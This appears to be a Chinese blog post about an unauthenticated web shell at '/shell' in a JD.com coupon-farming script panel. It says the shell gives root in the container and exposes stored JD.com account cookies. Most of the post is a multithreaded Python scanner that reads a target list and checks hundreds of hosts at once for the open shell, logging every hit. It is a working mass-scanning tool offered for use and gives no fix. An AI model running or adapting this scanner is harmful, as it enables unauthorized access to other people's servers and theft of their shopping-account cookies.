JD羊毛脚本漏洞

0x01 漏洞检测

漏洞payload: http://IP/shell

0x02 漏洞验证

在server.js代码中, 使用了在线的shell控制台, 该控制台未进行鉴权, 导致存在未授权访问

通过该漏洞获取容器中的root权限, 可通过容器逃逸获取宿主机权限

读取的京东cookie

以下为批量脚本, 代码比较粗糙,大佬勿喷

# -*- coding: utf-8 -*-
# @Time : 2021/6/30 9:07
# @Author : AD钙奶
import json
import re
import time
import requests
import ssl
import threadpool
from loguru import logger

try:
    requests.packages.urllib3.disable_warnings()
    _create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
    pass
else:
    ssl._create_default_https_context = _create_unverified_https_context


def brute_force(_url):
    urls = _url + '/shell'
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
        "Cache-Control": "max-age=0",
        "Connection": "keep-alive",
        "Cookie": "",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59",
    }
    try:
        resp = requests.get(url=urls, headers=headers, timeout=20)
        if resp.status_code == 200 and resp.headers['Set-Cookie']:
            info1 = f"系统存在未授权漏洞,存在漏洞的网站:  {str(urls)}"
            filename1 = time.strftime("%Y-%m-%d-") + 'vuln_存在未授权.txt'
            save_vuln(filename1, info1)
            logger.info(info1)
    except Exception as e:
        pass


def save_vuln(filename, info1):
    file_path = './result/' + filename
    with open(file_path, "a") as f:
        info1 = info1 + '\n'
        f.write(info1)


def open_file():
    with open("url3.txt", 'r', encoding='UTF-8') as f:
        urls = f.readlines()
    urls = [url.strip() for url in urls if url and url.strip()]
    return urls


def main():
    url = open_file()
    pool = threadpool.ThreadPool(200)
    thread = threadpool.makeRequests(brute_force, url)
    [pool.putRequest(req) for req in thread]
    pool.wait()


if __name__ == '__main__':
    main()